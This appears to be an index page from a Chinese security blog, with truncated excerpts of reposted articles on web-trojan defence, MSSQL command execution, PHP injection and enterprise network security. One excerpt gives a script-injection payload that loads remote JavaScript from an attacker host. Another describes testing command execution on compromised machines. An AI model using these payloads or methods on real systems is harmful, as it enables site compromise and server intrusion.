鬼仔注:前两天发过 <<二行代码解决全部网页木马>> 。
作者:lcx
来源:vbs小铺
原文在这:http://www.blueidea.com/tech/web/2008/5575.asp
主要目的是用css解决script标签里的http,这种方法治标不治本,我觉得防掉很难的,根治办法就是主机安全,不给别人黑掉的机会
突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。
代码:<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>
作者:伤心的鱼[BCT]
鬼仔's Blog( http://www.huaidan.org/blog/ )首发,转载请注明。
最早1986提出的access数据库执行系统命令,结果忽悠了一圈人 哈哈 不过这个public权限执行系统命令也算是个鸡肋…. YY 一下 安慰一下被我忽悠的同志们
很多朋友说public权限不能执行命令 其实是可以执行的~ 但是前提是启动 Sql server Agent 服务
其实SQL Server Agent 是一个任务规划器和警报管理器 默认安装 sql server是不开启的
不过我上午测试十个肉鸡成功了三四次。 看来有的管理员还是需要这个东西来提供报警的
其实就是利用MSSQL的作业处理也是可以执行命令 但是在@server_name要指定你的sql的服务器名
阅读全文 »
鬼仔注:跟《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》是同一作者。这篇文章是上次的增强。
作者:vickeychen
来源:经典论坛
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。
前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂 阅读全文 »
Tags: 网页木马, 网马作者:Lenk
出处:Lenk技术联盟http://www.slenk.net
事出有因,在看一个站点时候,得到一个注射点,站点类型为php+mysql,windows2003,一般情况下PHP报错会暴露出物理路径,不过如果在php.ini里配置了禁止错误日记显出或者在php脚本里用report控制出错信息的情况,很多出错信息都不能反馈给访问的客户端,在我们判断出 php注射点的执行账号为root的时候,我们习惯性的要导出一个shell或者loadfile读取文件代码。很可惜,我遇到的这个站点并没有任何的出错信息反馈回来,出错只给一个空白的页面,拿到root的时候窃喜,爆出表名,数据库等,资料收集得差不多了,就想把服务器拿下来,想着常规路线:loadfile或者select 阅读全文 »
Tags: IISby 云舒
2008-04-07
http://www.ph4nt0m.org
这是扯淡企业安全的第二篇,希望还有下一篇。因为这次要扯的意识和策略是个很麻烦的事情,可能写完这个就写不下去了。是策略,还是意识?这个问题经常被人争论,我的思路很直接,策略优先,意识第二。理由很简单,下面随便扯扯看。
首先,不是有较高的安全意识,就不会出问题。安全意识是很主观的一个东西,这就像在战场上,不是不想死的人就不会死。因为有那个意识,不一定有足够的手段能够维持这个意识的目的一定能够达到。简单的说,有一个普通员工,很有安全意识,不认识的人发的邮件不去看,附件不去点,网上乱七八糟的网站也从不浏览,只看CCTV这样和谐的页面。但是某天用工作笔记本在家上网,被人利用防火墙本身的漏洞,或者杀毒软件的漏洞,或者是f 阅读全文 »
Tags: Ph4nt0m, 企业安全by 云舒
2008-04-02
http://www.ph4nt0m.org
前些时候有人问过我现在怎么不做技术了,其实我也有做,不过没怎么做底层,而主要是以企业网络为主。从06年元月进入yahoo直到现在,我一直在做这些,只是很少写文章了。最近可能会空一点,扯淡一下企业网络的安全。
第一篇就从YY开始吧。这里随便YY一下内网安全的一部分内容,主要是YY赛门铁克的Symantec Sygate Enterprise Protection解决方案,以内网准入和内网划分为主。YY的原因是因为Symantec的Lan Enforcer支持根据客户端的完整性划分vlan,而微软的IAS支持从AD获取信息,按照用户划分vlan。
Symantec的标准做法是在接入层交换机上起802.1x,并且把认证服务器指向Sygate 阅读全文 »
Tags: Ph4nt0m, 企业安全